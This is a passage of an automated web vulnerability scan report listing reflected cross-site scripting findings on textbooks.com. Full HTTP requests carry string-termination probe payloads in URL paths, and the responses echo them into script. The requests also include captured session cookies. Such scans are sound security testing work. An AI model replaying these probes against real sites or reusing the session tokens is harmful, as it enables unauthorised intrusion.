User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3645
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:50 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog9cbf9';4bd41d8fcd1/S/Social-Sciences.php'

</script>
...[SNIP]...

1.33. http://www.textbooks.com/Catalog/S/Social-Sciences.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/S/Social-Sciences.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76e55'%3b5cea322eca4 was submitted in the REST URL parameter 3. This input was echoed as 76e55';5cea322eca4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/S/76e55'%3b5cea322eca4 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:51 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/S/76e55';5cea322eca4'

</script>
...[SNIP]...

1.34. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c3ed'%3b788bb26a33c was submitted in the REST URL parameter 1. This input was echoed as 4c3ed';788bb26a33c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog4c3ed'%3b788bb26a33c/T/Architecture-Engineering-Manufacture-and-Transport.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3680
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog4c3ed';788bb26a33c/T/Architecture-Engineering-Manufacture-and-Transport.php'

</script>
...[SNIP]...

1.35. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9590f'%3bfaf8f291a5e was submitted in the REST URL parameter 3. This input was echoed as 9590f';faf8f291a5e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/T/9590f'%3bfaf8f291a5e HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/T/9590f';faf8f291a5e'

</script>
...[SNIP]...

1.36. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/V/Vocational-and-Professional-Education.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef83c'%3b5c003b17b5 was submitted in the REST URL parameter 1. This input was echoed as ef83c';5c003b17b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalogef83c'%3b5c003b17b5/V/Vocational-and-Professional-Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3666
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:46 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalogef83c';5c003b17b5/V/Vocational-and-Professional-Education.php'

</script>
...[SNIP]...

1.37. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/V/Vocational-and-Professional-Education.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f234'%3ba0f0a99fb19 was submitted in the REST URL parameter 3. This input was echoed as 3f234';a0f0a99fb19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/V/3f234'%3ba0f0a99fb19 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:47 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/V/3f234';a0f0a99fb19'

</script>
...[SNIP]...

1.38. http://www.textbooks.com/CustServ-Contact.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-Contact.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3be2e'%3b1c6a9d6e709 was submitted in the REST URL parameter 1. This input was echoed as 3be2e';1c6a9d6e709 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-Contact.php3be2e'%3b1c6a9d6e709 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3636
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:23 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
